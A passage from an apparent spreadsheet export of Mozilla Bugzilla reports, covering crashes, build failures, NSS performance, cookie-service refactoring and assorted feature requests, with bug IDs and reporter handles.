    <t>nsIContentPrefService should provide an interface for listing stored prefs.</t>
  </si>
  <si>
    <t>I was working on an extension to add some site-specific preferences and nsIContentPrefService was a natural fit for this. It made setting and checking for a preference nice and easy.
But I also wanted to add some management UI to allow the user to see what preferences they had set and delete/modify them if they don't want them stored any more. There's no API to do anything like this so I had to use cps.DBConnection to query the DB directly.
It would be nice to be able to do something like:
var cps = Cc[...].getService(Ci.nsICPS)
var prefs = cps.getAllSitePrefs(my.pref.name)
// prefs is an array
for (i=0 i&lt;prefs.length i++)
  dump(Host:  + prefs[i].hostname +  set to  + prefs[i].value)
I suppose a getAllPrefNames() API might be useful to have too.
A secondary issue is that the hostname retrieved from the DB this way is not a proper URL (just www.host.com) but all the nsICPS interfaces require a nsIURI to modify or delete the pref. This can be fudged by prepending http:// to the string and running it though ioService.newURI() not sure if there's a better way to do it.</t>
  </si>
  <si>
    <t>dolske</t>
  </si>
  <si>
    <t>TOOLKIT-422121</t>
  </si>
  <si>
    <t>On a tree built from an XML template using the content-builder sorting a column crashes the browser</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.11) Gecko/20071128 SeaMonkey/1.1.7
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.9b4) Gecko/2008030714 Firefox/3.0b4
If a tree is built from an XML template without flags=dont-build-content and a sort attribute is added to the columns clicking on the column header three times (i.e. to return to the Natural sort order) will crash the browser.
Reproducible: Always
Steps to Reproduce:
1. Create a tree from an XML template but don't add flags=dont-build-content
2. Add appropriate sort attributes to the treecol elements
3. Load the page in Firefox and click on a column header
Actual Results:  
Initially the data are shown unsorted (natural order).
The first click causes them to be sorted in ascending order.
The second click causes them to be sorted in descending order.
The third click causes the browser to crash.
Expected Results:  
The data should be returned to their original unsorted order. At the very least it shouldn't cause the whole browser to crash.
I have confirmed that this also affects Firefox 3 on Linux but have only been able to test an older build on that platform - Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9b3pre) Gecko/2008020507 Firefox/3.0b3pre</t>
  </si>
  <si>
    <t>mark.crutch+bugzilla</t>
  </si>
  <si>
    <t>TESTING-866195</t>
  </si>
  <si>
    <t>Autophone</t>
  </si>
  <si>
    <t>Improve Autophone s1s2 test reproducibility</t>
  </si>
  <si>
    <t>Recently when attempting to fix bug 862508 to allow Autophone to test Android 4.2 devices I ran in an apparent regression in throbberstart due to the change in how Fennec is launched.
While attempting to investigate the regression I ran tests of how fennec is launched comparing the current Autophone run_fennec_with_profile method (call it A) to versions of run_fennec_with_profile which used mozbase's launchFennec without (call it B) and with (call it C) the -W argument to am.  There was no consistent ordering between phones of the 3 values. Values A and B which should have been identical were consistently different. In addition the variability of the test results as shown by the standard deviations made it difficult to make accurate comparisons. Something to note is that I ran A B and C in the same session with the same profile without rebooting in between.
The variability of the test results is very apparent when looking at the recent results at . This is especially true for the remote page tests where the network connections are throttled via ipfw to 780Kbps down and 330Kbps up. I do not know whether the throttled network is the cause of the variability or if it has some other cause. In my opinion these results are so noisy as to be unusable.
I checked the performance of the phonedash web server using httperf as compared to nginx for serving the static files for Twitter2.html and did not see any performance issue which might affect the tests.
This led me to reading up on test reproducibility and got me thinking about how we actually run the tests. A simplified description of how Autophone runs the s1s2 tests is:
reboot phone
install fennec
for cache in disabled enabled:
   create profile with cache preferences
   launch fennec to initialize the profile
   for test in local-blank local-twitter remote-blank remote-twitter:
      for iteration in iterations:
          launch fennec and load the test page
          collect and report throbberstart throbberstop values
We use the throbberstart and throbberstop values from the iterations to calculate a mean and standard deviation which is displayed on phonedash.
I see several problems in this approach which may affect the reliability and reproducibility of the tests.
1. We test the uncached behavior using prefs to disable the cache. I think it would be more realistic if we used the normal cache settings and treated the first load of a page as the uncached test and treated the second load of a page as the cached test.
2. We do not reboot the phone in between the test pages nor in between the iterations. We treat each test and iteration as an independent measurement when as currently implemented each test and iteration depends upon the previous tests and iterations. I think we should reboot before each measurement to eliminate any influences from prior measurements.
3. Our choice of iterations is ad-hoc. Rather than focusing on the standard deviation of the measurements we can choose the iterations to reduce the standard error of the mean and perhaps obtain more reliable results. I think that implementing #2 will help in improving reliability and help in choosing a realistic and useful iteration count. For background reading http://en.wikipedia.org/wiki/Standard_error and http://en.wikipedia.org/wiki/Standard_deviation
The proposed test execution would look like:
reboot phone
install fennec
launch fennec to make sure the build is usable
if fennec is not usable:
  abort test
for test in local-blank local-twitter remote-blank remote-twitter:
   for iteration in iterations:
       reboot phone
       create profile
       launch fennec to initialize the profile
       launch fennec and load the test page
       collect and report uncached throbberstart throbberstop values
       launch fennec and load the test page
       collect and report cached throbberstart throbberstop values
I would like to take some of the redundant phones out of the production Autophone s1s2 runs to use in testing this approach. We could keep the current Autophone running in production on the remaining phones until we determine if this is a valid approach. If we do switch to this new behavior I can rerun previous data to fill in the historical behavior.
Thoughts?</t>
  </si>
  <si>
    <t>NSS-121523</t>
  </si>
  <si>
    <t>PKCS Lock Contention (sessionLock and scalability)</t>
  </si>
  <si>
    <t>Shifted from bug 116255 (see Commens #23 through #27).
This bug was opened to separate the 7.4% performance degradation
(between 3.3.1 and 3.4) because the scalability problems reported
by Shih-Hao-Hung (of Sun) are a separate issue.
Note also the contention on slot-&gt;sessionLock that Shih-Hao-Hung
reported (by profiling with a tool called plockstat under Solaris)
was done on a 12-cpu box.   He added recently:
It seems to me that the session lock affect the performance of a large 
system. In our experiments we did not see its effect when the number of 
processors is less or equal to 4. It might be the reason why you did not 
get good results from your 4-way system.
iWS6+Deimos on 1GHz Serengeti: (HTTP_LOAD)
#cpu    ops/s (maxprocs=1)  ops/s (maxprocs=12)
 1       298 (0% idle)          296 (0% idle)
 2       520 (0% idle)          516 (0% idle)
 4       950 (0% idle)          960 (0% idle)
 8       900 (3% idle)         1720 (0% idle)
 12     1050 (58% idle)        2448 (0% idle)
The comments in 116255 by Bob Relyea outlined a plan of attack
I have followed through on.  There's still a SEGV to iron out
and tuning to do on the buckets and total session hash entries.
The plan is to update this bug with a patch for review and target 
the 3.4.1 NSS release.
We'll feed a build of the patched library back to Shi-Hao-Hung
for comparison and profiling before check-in.  He is using NSS 
with iWS 6.0 whereas my benchmarking is with selfserv.  
In addition to converting slot-&gt;sessionLock into a bucket of locks
we may pool sessions.  Further investigation is needed.  I will 
update this bug with a stack trace for Bob to inspect showing where
sessions are being destroyed from (assuming this is the case).</t>
  </si>
  <si>
    <t>kirk.erickson</t>
  </si>
  <si>
    <t>CORE-370553</t>
  </si>
  <si>
    <t>Crash [@ nsStyleBorder::SetBorderStyle] when setting layout.css.dpi pref to 30000</t>
  </si>
  <si>
    <t>To reproduce:
- Go to about:config
- Set layout.css.dpi to 30000
Result -&gt; crash
Talkback ID: TB29372009E
nsStyleBorder::SetBorderStyle  [mozilla\dist\include\layout\nsstylestruct.h line 419]
nsRuleNode::WalkRuleTree  [mozilla\layout\style\nsstylestructlist.h line 136]
nsRuleNode::GetBorderData  [mozilla\layout\style\nsrulenode.cpp line 1193]
nsRuleNode::GetStyleBorder  [mozilla\layout\style\nsstylestructlist.h line 134]
nsStyleContext::GetStyleBorder  [mozilla\layout\style\nsstylestructlist.h line 134]
nsIFrame::GetBorderAndPadding  [mozilla\layout\xul\base\src\nsbox.cpp line 345]
nsFrame::RefreshSizeCache  [mozilla\layout\generic\nsframe.cpp line 5807]
nsFrame::GetBoxAscent  [mozilla\layout\generic\nsframe.cpp line 5982]
nsBoxFrame::GetBoxAscent  [mozilla\layout\xul\base\src\nsboxframe.cpp line 869]
nsBoxFrame::GetBoxAscent  [mozilla\layout\xul\base\src\nsboxframe.cpp line 869]
nsBoxFrame::GetBoxAscent  [mozilla\layout\xul\base\src\nsboxframe.cpp line 869]
nsBoxFrame::GetBoxAscent  [mozilla\layout\xul\base\src\nsboxframe.cpp line 869]
nsBoxFrame::GetBoxAscent  [mozilla\layout\xul\base\src\nsboxframe.cpp line 869]
This regressed when the fix for bug 177805 went in.
Maybe there should be a maximum allowed value or something?</t>
  </si>
  <si>
    <t>sharparrow1</t>
  </si>
  <si>
    <t>THUNDERBIRD-329441</t>
  </si>
  <si>
    <t>am-offline.xul l10n issues</t>
  </si>
  <si>
    <t>Reuse of accelerator key will not work in all languages</t>
  </si>
  <si>
    <t>dwayne</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-518291</t>
  </si>
  <si>
    <t>File of experimental version missing</t>
  </si>
  <si>
    <t>1. Go to https://addons.mozilla.org/de/firefox/addons/versions/3887
2. Try to download the newest version (0.1.2 experimental).
Actual result: Download is a 404 page.</t>
  </si>
  <si>
    <t>aryx.bugmail</t>
  </si>
  <si>
    <t>CORE-220624</t>
  </si>
  <si>
    <t>[cookies] refactor prompting helper to where it belongs</t>
  </si>
  <si>
    <t>currently nsCookieService::SetCookieInternal does an extra cookielist traversal
that's not necessary in most cases: it needs to find whether a site has set any
cookies previously in order to pass that info into the prompting code to
display to the user. if the user has the prompt me before setting cookies pref
turned off these cycles are wasted...
patch coming up which pushes this code into nsCookiePermission::CanSetCookie
to be executed only when necessary. this has the consequence that
nsCookieService::FindCookiesFromHost must now be exposed publicly so i've done
that via nsICookieManager2.
the code for checking if the cookie has already expired (so we don't prompt the
user in that case) is ugly i wish we could kill it... :/</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-408868</t>
  </si>
  <si>
    <t>Teach verify-locales about tar.bz2 and betas</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-393319</t>
  </si>
  <si>
    <t>Tag Thunderbird 1.5.0.13 Release Notes for Production</t>
  </si>
  <si>
    <t>I've put together the 1.5.0.13 release notes which can be tagged for production. We can push them live when we push all-older.html tomorrow...</t>
  </si>
  <si>
    <t>BUGZILLA-303088</t>
  </si>
  <si>
    <t>MoreSQLData and FetchSQLData/FetchOneColumn may return wrong results</t>
  </si>
  <si>
    <t>DB::MoreSQLData checks if $_fetchahead is defined in order to know if the
previous query returned some results or not:
return 1 if defined $_fetchahead
But only DB::FetchSQLData clears $_fetchahead after each call meaning that
$_fetchahead may remain defined if you only check MoreSQLData without
effectively considering some results of the query.
Consider the following case:
SendSQL($query1)                      # returns more than one result
my $result1 = (MoreSQLData())? 1 : 0  # $result1 = 1
SendSQL($query2)                      # returns no result (undef)
my $result2 = (FetchSQLData())? 1 : 0 # $result2 = 1 !!!
In this case $result2 = 1 despite the fact that the second query returns no
results!!
This problem appears in editgroups.cgi when deleting a group see ($action eq
del).</t>
  </si>
  <si>
    <t>CORE-394261</t>
  </si>
  <si>
    <t>Spelling checker</t>
  </si>
  <si>
    <t>Update Hunspell to version 1.1.12</t>
  </si>
  <si>
    <t>Created attachment 278889
Hunspell 1.1.8 to 1.1.11 patch
I'm attaching a patch to update Hunspell to 1.1.11 as a checkpoint but I'm going to hold off on requesting review until 1.1.12 is release which Nemeth tells me is forthcoming.
What's new in 1.1.9 - 1.1.11:
-Fix for OpenSolaris build issue
-Fix for VC7.1 build issue
-Fix for Mingw build issue
-New phonetic transition table allowing for spelling recommendations to be made on words with more than one letter swapped (ie. htne -&gt; then &amp; htikn -&gt; think)
-Other various bug fixes (see the release notes at http://hunspell.sf.net for more info)
I've only tested this patch on VC8SP1 so it would be good to get some Linux test coverage. Also Gavin Ginn and Martijn can you make sure this still compiles OK on your platforms as a quick sanity check?</t>
  </si>
  <si>
    <t>ryanvm</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-524662</t>
  </si>
  <si>
    <t>Filters</t>
  </si>
  <si>
    <t>Customize Headers window is prompted twice (Creating/adding customized filter header or removing it requires to click 'OK' twice)</t>
  </si>
  <si>
    <t>STR:
1. open a new saved search window using context menu on specific folder
2. in criterias area select customize for open Customize Headers window
3. fill new message header with e.g X-Bugzilla-Status and then click Add button
4. click OK button for unload window: the window is already prompted to user.
It seems to happens also the first time that this operation is raised from a specific folder.
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1.5pre) Gecko/20091026 Lightning/1.0pre Shredder/3.0pre ID:20091026031601</t>
  </si>
  <si>
    <t>euryalus.0</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-260322</t>
  </si>
  <si>
    <t>Chatzilla should have an RSS / RDF / Atom feed</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O rv:1.7.3) Gecko/20040913 Firefox/0.10
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O rv:1.7.3) Gecko/20040913 Firefox/0.10
Chatzilla should have an RSS / RDF / Atom feed... not much to it.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
I can do this if you'd like. Just send me an e-mail. I'm not sure if you already
store the version info that's on the site in a database. I would just need to
know the schema (a db dump would suffice) and a prefered language
(PHP/Perl/whatever).</t>
  </si>
  <si>
    <t>micklweiss</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-515348</t>
  </si>
  <si>
    <t>slaves in the new vlan sometimes lose their remote</t>
  </si>
  <si>
    <t>I was having a look at the balance of the slave pool and noticed that many (2 linux 7 win32) slaves that are in the new vlan lost their remote indicated by this in the Buildbot slave log (also by their absence on the master):
2009/09/09 04:31 -0700 [Brokerclient] lost remote
2009/09/09 04:31 -0700 [Brokerclient] lost remote
2009/09/09 04:31 -0700 [Brokerclient] lost remote
2009/09/09 04:31 -0700 [Brokerclient] lost remote
2009/09/09 04:31 -0700 [Brokerclient] lost remote
2009/09/09 04:31 -0700 [Brokerclient] lost remote
2009/09/09 04:31 -0700 [Brokerclient] lost remote
2009/09/09 04:31 -0700 [Brokerclient] lost remote
2009/09/09 04:31 -0700 [Brokerclient] lost remote
2009/09/09 04:31 -0700 [Brokerclient] lost remote
A few theories off the top of my head:
* too many slaves on one master is making Buildbot lose some
* the new vlan is configured in such a way that it's causing this
* the new slaves somehow have a different version of buildbot that's busted in some way
Given that this problem hasn't shown up until the new vlan existed and has only happened on the new slaves it seems likely that it's option #2 or #3. We should do a buildbot version comparison on a few new slaves vs old to look at that possibility and rope in IT to look at the vlan config.</t>
  </si>
  <si>
    <t>dmoore</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-213718</t>
  </si>
  <si>
    <t>alkhaircqw.com - uses backslashes in frameset URIs</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.5b) Gecko/20030715
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.5b) Gecko/20030715
The web site Al Khair Creative Quality Ware uses backslashes as path
separators in its URIs.  This results in 404 errors on any web browser that
doesn't break RFCs by automatically translating '\' to '/' throughout.
Reproducible: Always
Steps to Reproduce:
1. Go to http://alkhaircqw.com/
2. Click Men's &amp; Boy's Garments or How to Order (in fact most of the links
   on the given page)
Actual Results:  
Frameset appears with 404 error pages from Apache containing URLs with
backslashes.
Expected Results:  
Links in frameset page should have proper path separators (i.e. '/').</t>
  </si>
  <si>
    <t>d_yerrick</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-210833</t>
  </si>
  <si>
    <t>theinformationminister.com - invalid JS prevents page from displaying</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3) Gecko/20030312
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3) Gecko/20030312
blank page no display.
works in IE.
Enabled and Disabled Pipelining
Reproducible: Always
Steps to Reproduce:
Expected Results:  
displayed page.</t>
  </si>
  <si>
    <t>cspence</t>
  </si>
  <si>
    <t>NSS-279542</t>
  </si>
  <si>
    <t>[s390] nsinstall is segfaulting during the build process</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041217
Build Identifier: ftp://ftp.mozilla.org/pub/mozilla.org/mozilla/releases/mozilla1.7.5/source/mozilla-source-1.7.5.tar.bz2
I am trying to build Mozilla 1.7.5 for distribution with Slack/390.  I am
running into a problem where nsinstall is getting a segmentation fault:
cd nsinstall /usr/bin/gmake -j1 libs
gmake[5]: Entering directory `/tmp/mozilla/security/coreconf/nsinstall'
gcc -o Linux2.4_s390_glibc_PTH_OPT.OBJ/nsinstall.o -c -O2 -fPIC -DLINUX1_2
-D_XOPEN_SOURCE -DLINUX2_
1 -ansi -Wall -pipe -DLINUX -Dlinux -D_POSIX_SOURCE -D_BSD_SOURCE
-DHAVE_STRERROR -DXP_UNIX -UDEBUG
-DNDEBUG -D_REENTRANT -I/tmp/mozilla/dist/include 
-I../../../dist/public/coreconf -I../../../dist/p
rivate/coreconf -I../../../dist/include -I/tmp/mozilla/dist/include/nspr
-I/tmp/mozilla/dist/include
/dbm  nsinstall.c
gcc -o Linux2.4_s390_glibc_PTH_OPT.OBJ/pathsub.o -c -O2 -fPIC -DLINUX1_2
-D_XOPEN_SOURCE -DLINUX2_1
-ansi -Wall -pipe -DLINUX -Dlinux -D_POSIX_SOURCE -D_BSD_SOURCE -DHAVE_STRERROR
-DXP_UNIX -UDEBUG -D
NDEBUG -D_REENTRANT -I/tmp/mozilla/dist/include  -I../../../dist/public/coreconf
-I../../../dist/pri
vate/coreconf -I../../../dist/include -I/tmp/mozilla/dist/include/nspr
-I/tmp/mozilla/dist/include/d
bm  pathsub.c
gcc -o Linux2.4_s390_glibc_PTH_OPT.OBJ/nsinstall -O2 -fPIC -DLINUX1_2
-D_XOPEN_SOURCE -DLINUX2_1 -an
si -Wall -pipe -DLINUX -Dlinux -D_POSIX_SOURCE -D_BSD_SOURCE -DHAVE_STRERROR
-DXP_UNIX -UDEBUG -DNDE
BUG -D_REENTRANT -I/tmp/mozilla/dist/include  -I../../../dist/public/coreconf
-I../../../dist/privat
e/coreconf -I../../../dist/include -I/tmp/mozilla/dist/include/nspr
-I/tmp/mozilla/dist/include/dbm
 Linux2.4_s390_glibc_PTH_OPT.OBJ/nsinstall.o
Linux2.4_s390_glibc_PTH_OPT.OBJ/pathsub.o    -L/lib -lp
thread  -ldl -lc
Linux2.4_s390_glibc_PTH_OPT.OBJ/nsinstall.o(.text+0x2f4): In function `togid':
: warning: Using 'getgrnam' in statically linked applications requires at
runtime the shared librari
es from the glibc version used for linking
Linux2.4_s390_glibc_PTH_OPT.OBJ/nsinstall.o(.text+0x23c): In function `touid':
: warning: Using 'getpwnam' in statically linked applications requires at
runtime the shared librari
es from the glibc version used for linking
rm -f nfspwd cp nfspwd.pl nfspwd chmod +x nfspwd
true -m 775 Linux2.4_s390_glibc_PTH_OPT.OBJ/nsinstall /tmp/mozilla/dist/bin
gmake[5]: Leaving directory `/tmp/mozilla/security/coreconf/nsinstall'
gmake[4]: Leaving directory `/tmp/mozilla/security/coreconf'
cd ../../dist/lib cp -f libmozdbm_s.a libdbm.a ranlib libdbm.a
/usr/bin/gmake -C ../../security/nss/lib MAKE=/usr/bin/gmake -j1 -j1
MOZILLA_INCLUDES=-I/tmp/mozi
lla/dist/include/nspr -I/tmp/mozilla/dist/include/dbm
SOURCE_MD_DIR=/tmp/mozilla/dist DIST=/tmp/moz
illa/dist MOZILLA_CLIENT=1 NO_MDUPDATE=1 BUILD_OPT=1 NS_USE_GCC=1 NS_USE_NATIVE=
gmake[4]: Entering directory `/tmp/mozilla/security/nss/lib'
cd util /usr/bin/gmake -j1 export
gmake[5]: Entering directory `/tmp/mozilla/security/nss/lib/util'
Creating ../../../../dist/public/nss
/bin/sh: line 1: 29427 Segmentation fault     
../../../coreconf/nsinstall/Linux2.4_s390_glibc_PTH_O
PT.OBJ/nsinstall -D ../../../../dist/public/nss
gmake[5]: *** [../../../../dist/public/nss] Error 139
gmake[5]: Leaving directory `/tmp/mozilla/security/nss/lib/util'
gmake[4]: *** [export] Error 2
gmake[4]: Leaving directory `/tmp/mozilla/security/nss/lib'
gmake[3]: *** [libs] Error 2
gmake[3]: Leaving directory `/tmp/mozilla/security/manager'
gmake[2]: *** [tier_50] Error 2
gmake[2]: Leaving directory `/tmp/mozilla'
make[1]: *** [default] Error 2
make[1]: Leaving directory `/tmp/mozilla'
make: *** [build] Error 2
I used the following configure command:
BUILD_OFFICIAL=1 MOZILLA_OFFICIAL=1 \
./configure --prefix=/usr \
  --enable-optimize=-O2 \
  --with-default-mozilla-five-home=/usr/lib/mozilla-1.7.5 \
  --enable-strip-libs \
  --disable-tests \
  --disable-short-wchar \
  --enable-nspr-autoconf \
  --enable-calendar \
  --enable-extensions=defaultirc \
  --enable-crypto \
  --disable-xprint \
  --without-system-nspr \
  --with-system-zlib \
  --enable-default-toolkit=gtk2 \
  --disable-freetype2 \
  --enable-xft \
  --enable-application=suite
I am able to duplicate this problem with a CVS checkout from today.
I am using gcc 3.3.4 glibc 2.3.3 binutils 2.15.92.0.2.
Reproducible: Always
Steps to Reproduce:
1. Untar source
2. cd mozilla/
3. configure as above
4. make -f client.mk build
Actual Results:  
The compile runs for a very long time before dying with a segfault in nsinstall.
Expected Results:  
Not segfaulted.
If needed I can create an account on the system for someone to debug the problem.</t>
  </si>
  <si>
    <t>markkp</t>
  </si>
  <si>
    <t>MOZILLA.ORG-527483</t>
  </si>
  <si>
    <t>Video</t>
  </si>
  <si>
    <t>Create part 2 of HTML5 series</t>
  </si>
  <si>
    <t>Part 2 will deal with geolocation.  Rainer will add more.</t>
  </si>
  <si>
    <t>rcvillink</t>
  </si>
  <si>
    <t>CORE-230877</t>
  </si>
  <si>
    <t>XML</t>
  </si>
  <si>
    <t>scrollbar thumb does not draw if MOZ_XUL not defined</t>
  </si>
  <si>
    <t>Scrollbar thumbs don't show up if MOZ_XUL is not #defined.  This is a
side-effect of IsContentOfType(eXUL) returning FALSE because we use
nsXMLElement for XUL elements with MOZ_XUL undefined (i.e. we don't use any of
the XUL cache or prototype stuff).  This affects the scrollbar by causing
whitespace not to be stripped by the XBL content sink causing the slider to get
an extra text node child and therefore not being able to locate its thumb in
the expected place.</t>
  </si>
  <si>
    <t>FIREFOX-426930</t>
  </si>
  <si>
    <t>Close icon in File menu looks pixellated/gross on Linux</t>
  </si>
  <si>
    <t>See attached screenshot -- the Close icon looks kinda gross in Firefox's file menu on Linux.</t>
  </si>
  <si>
    <t>CORE-393695</t>
  </si>
  <si>
    <t>Widget</t>
  </si>
  <si>
    <t>Kill old gfx code in nsDeviceContextSpec with OS</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a8pre) Gecko/2007082505 Minefield/3.0a8pre
Build Identifier: 
Remove all the old dead gfx code from  nsDeviceContextSpec with OS.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>xfsunoles</t>
  </si>
  <si>
    <t>SEAMONKEY-63131</t>
  </si>
  <si>
    <t xml:space="preserve">Move onclick/ondraggesture handlers from  to </t>
  </si>
  <si>
    <t>The click/drag handlers in navigator.xul are on the appcontent  which is 
incorrect they should be on the .  The current location of 
ondragdrop allows you to drop files on the statusbar to load them in the 
content area.  IE lets you do this 4.x doesn't.  Do we want to allow this?  
Will users consider the statusbar part of the content area?  Doesn't matter to 
me either way but all the other handlers definitely need to be on .</t>
  </si>
  <si>
    <t>CORE-50998</t>
  </si>
  <si>
    <t>XP impl of GetAveCharWidth and remove ifdef _win32 in GfxText</t>
  </si>
  <si>
    <t>I need to remove the ifdef _WIN32 in nsGfxTextControlFrame2.cpp and implement a 
cross platform GetAveCharWidth</t>
  </si>
  <si>
    <t>rods</t>
  </si>
  <si>
    <t>CORE-391722</t>
  </si>
  <si>
    <t>Add stack-and-abort value of XPCOM_DEBUG_BREAK</t>
  </si>
  <si>
    <t>That way we can have a tinderbox with fatal asserts that give stacks.</t>
  </si>
  <si>
    <t>CORE-70055</t>
  </si>
  <si>
    <t>DOM: CSS Object Model</t>
  </si>
  <si>
    <t>Get style.zIndex not yet implemented</t>
  </si>
  <si>
    <t>Getting zIndex is not yet implemented. When you try to return the zIndex it 
returns a null string. I will omit personal opinion about this except to say I 
hope it gets implemented soon.
NS_IMETHODIMP
nsComputedDOMStyle::GetZIndex(nsAWritableString&amp; aZIndex)
{
return NS_ERROR_DOM_NOT_SUPPORTED_ERR
}
http://lxr.mozilla.org/mozilla/source/content/html/style/src/nsComputedDOMStyle.
cpp#1334
Testcase will be attached.
I also noticed that a few more things in that file weren't implemented.</t>
  </si>
  <si>
    <t>harishd</t>
  </si>
  <si>
    <t>NSS-211540</t>
  </si>
  <si>
    <t>regression: cert-&gt;emailAddr is never NULL</t>
  </si>
  <si>
    <t>The fix for bug 152986 introduced a regression in NSS.
Prior to that fix if a cert had no email address cert-&gt;emailAddr would be
NULL.  There are numerous places in NSS that test that pointer for NULL to 
see if the cert has an email address when then take different courses of 
action depending on whether the pointer is NULL or not.  This undoubtedly
is causing undesirable behavior such as creating empty attributes on some
cert objects.
The new function cert_GetCertificateEmailAddresses differs from the function 
it replaced when the cert contains no email address.  The old function returned
NULL.  The new function returns a pointer to an empty string.  This appears to
be wrong. 
I recommend that cert_GetCertificateEmailAddresses be changed to return NULL
rather than a pointer to an empty string AND that all places that test
cert-&gt;emailAddr be changed to test for either a NULL pointer or an empty string
e.g. 
-   if (cert-&gt;emailAddr)
+   if (cert-&gt;emailAddr &amp;&amp; cert-&gt;emailAddr[0])</t>
  </si>
  <si>
    <t>MOZILLA.ORG-340445</t>
  </si>
  <si>
    <t>FTP: Mirrors</t>
  </si>
  <si>
    <t>128.61.127.9 changing ip adddress</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
I've been asked by our network architect to change the address of our mirror of ftp.mozilla.org from 128.61.127.9 to 128.61.111.9.
I'm responding to http and ftp traffic on both addresses at the moment can the ftp.mozilla.org rotation be updated to use 128.61.111.9 rather than 128.61.127.9?
Thanks!
Reproducible: Always</t>
  </si>
  <si>
    <t>lxmirror</t>
  </si>
  <si>
    <t>CORE-460882</t>
  </si>
  <si>
    <t>setTimeout loses XPCNativeWrappers</t>
  </si>
  <si>
    <t>I'm spinning this bug off of bug 459906. The problem is that session store has (basically) this set up:
aContent = XPCNativeWrapper(contentWindow)
aContent.setTimeout(function(){this.document.designMode} 0)
The expectation is that 'this' will be an XPCNativeWrapper. However it isn't because setTimeout goes through the JS timeout handler stuff which calls into nsJSContext::CallEventHandler which has no way of wrapping 'this'. We should provide an API in XPConnect to allow callers to wrap native objects like XPConnect was about to call into a function.</t>
  </si>
  <si>
    <t>bent.mozilla</t>
  </si>
  <si>
    <t>NSS-489811</t>
  </si>
  <si>
    <t>RNG_SystemInfoForRNG called twice by nsc_CommonInitialize</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #466745 +++
Bug 466756 comment #99
From time to time I was running in to a slow script warning in the login manager code which turned out to be caused by trying to get the pk11tokendb service which needed to initialise NSS which was enumerating my IE cache. Clearing my IE cache resolved my problem.
Bug 466756 comment #100 From Nelson Bolyard (:MisterSSL)
Neil yes the code now limits the depth into the directories into which
it will descend looking for files.  Look for maxDepth in the code.
Perhaps we also need a limit on the number of files and/or immediate 
subdirectories of a single directory through which we will search.
Bug 466756 comment #103
All Temporary Internet Files are stored at the same depth:
%USERPROFILE%\Local Settings\Temporary Internet Files\Content.IE5\\
For some reason I now see the scan happening four times (as recorded by printf()s I've added to EnumSystemFiles).
Bug 466756 comment #105
Seems to be caused by this block of code from pkcs11.c:
    rv = RNG_RNGInit()         /* initialize random number generator */
    if (rv != SECSuccess) {
    crv = CKR_DEVICE_ERROR
    return crv
    }
    rv = BL_Init()             /* initialize freebl engine */
    if (rv != SECSuccess) {
    crv = CKR_DEVICE_ERROR
    return crv
    }
    RNG_SystemInfoForRNG()
RNG_RNGInit() already calls RNG_SystemInfoForRNG() (via PR_CallOnce no less)!
&gt;freebl3!RNG_SystemInfoForRNG(void)+0x223 [security\nss\lib\freebl\win_rand.c @ 358]
&gt;freebl3!rng_init(void)+0x14c [security\nss\lib\freebl\drbg.c @ 420]
&gt;nspr4!PR_CallOnce(struct PRCallOnceType * once = 0x0b938cf8  * func = 0x0b8e73a0)+0x35 [nsprpub\pr\src\misc\prinit.c @ 808]
&gt;freebl3!RNG_RNGInit(void)+0x13 [security\nss\lib\freebl\drbg.c @ 462]
&gt;softokn3!RNG_RNGInit(void)+0x25 [security\nss\lib\freebl\loader.c @ 835]
&gt;softokn3!nsc_CommonInitialize(void * pReserved = 0x0012d7d4 int isFIPS = 0)+0x57 [security\nss\lib\softoken\pkcs11.c @ 2582]
&gt;freebl3!RNG_SystemInfoForRNG(void)+0x223 [security\nss\lib\freebl\win_rand.c @ 358]
&gt;softokn3!RNG_SystemInfoForRNG(void)+0x22 [security\nss\lib\freebl\loader.c @ 1570]
&gt;softokn3!nsc_CommonInitialize(void * pReserved = 0x0012d7d4 int isFIPS = 0)+0x91 [security\nss\lib\softoken\pkcs11.c @ 2602]</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-407796</t>
  </si>
  <si>
    <t>update linux VM kernels to same new stable version</t>
  </si>
  <si>
    <t>It refuses to mount rw:
[root@production-trunk-automation ~]# pwd
/root
[root@production-trunk-automation ~]# mount -o remountrw /
mount: block device /dev/sda1 is write-protected mounting read-only
[root@production-trunk-automation ~]# touch foo
touch: cannot touch `foo': Read-only file system
[root@production-trunk-automation ~]# 
This is blocking Firefox 3.0 Beta 2</t>
  </si>
  <si>
    <t>john+bugzilla</t>
  </si>
  <si>
    <t>CORE-285285</t>
  </si>
